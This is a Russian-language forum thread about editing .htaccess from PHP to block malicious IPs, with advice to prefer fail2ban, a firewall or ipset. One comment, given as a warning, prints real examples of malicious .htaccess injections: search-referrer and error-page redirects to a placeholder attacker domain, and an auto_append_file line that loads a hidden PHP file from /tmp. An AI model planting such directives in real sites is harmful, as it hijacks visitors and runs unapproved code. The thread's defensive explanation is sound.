Как редактировать файл .htaccess через PHP?

Question

[uuuu]

Создал бота, который определяет вредоносные IP на PHP, вот только не получается отредактировать файл .htaccess через PHP. Нашел информацию, что лучше это делать через RewriteEngine, но как это сделать? У меня есть большой массив IP, который постоянно пополняется.

Answer 1

[Barmunk]

https://htaccessbook.com/block-ip-address/
выбирай на свой вкус.

Но я не советую давать доступ на запись htaccess, будет явная дыра. Лучше настроить fail2ban на парсинг очередного лога, либо средствами php блокировать ip адреса, беря их из наполняемого, к примеру, csv файла

Comments

[uuuu]

Спасибо!
А в чем будет дыра?
POST и GET , PUT (и так далее) запросы со сторонних сайтов все отключены

[Barmunk]

uuuu, часто при взломе сайта правят htaccess так, чтобы это было не заметно, ничего больше не трогая, самый безобидный вариант:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://EVILHACKERSITE.COM/in.html?s=hg [R,L]
Errordocument 404 http://EVILHACKERSITE.COM/in.html?s=hg_err

или не так явно, ведя не на сайт, а отдельный скрипт на хостинге, который уже будет редиректить.

или

RewriteEngine On
ErrorDocument 400 http://EVILHACKERSITE.COM
ErrorDocument 401 http://EVILHACKERSITE.COM
ErrorDocument 403 http://EVILHACKERSITE.COM
ErrorDocument 404 http://EVILHACKERSITE.COM
ErrorDocument 500 http://EVILHACKERSITE.COM

или

php_value auto_append_file “/tmp/13063671977873.php”

Answer 2

[SagePtr]

Проблема ещё в том, что апач прожорливый, и если пытаетесь защититься при помощи .htaccess от множества запросов - то скорее всего, эти запросы уже положат апач. А ещё, если адресов в чёрном списке будет много - то это сильно замедлит легитимные запросы, потому что при каждом запросе должен будет читаться и парситься .htaccess, который будет очень сильно расти.
Потому блокировать нужно явно ещё раньше, к примеру, средствами брандмауэра (если не рассматривать внешние способы защиты, при которой эта задача ложится на хостера или промежуточное звено вроде cloudflare, а до сервера доходят уже отфильтрованные запросы).
При большом объёме - чёрный список должен быть не линейным, т.к. время O(n) нас явно не устраивает, проверки наличия адреса будут занимать много времени, поможет к примеру ipset, хранящий отмеченные адреса в виде хэш-таблицы.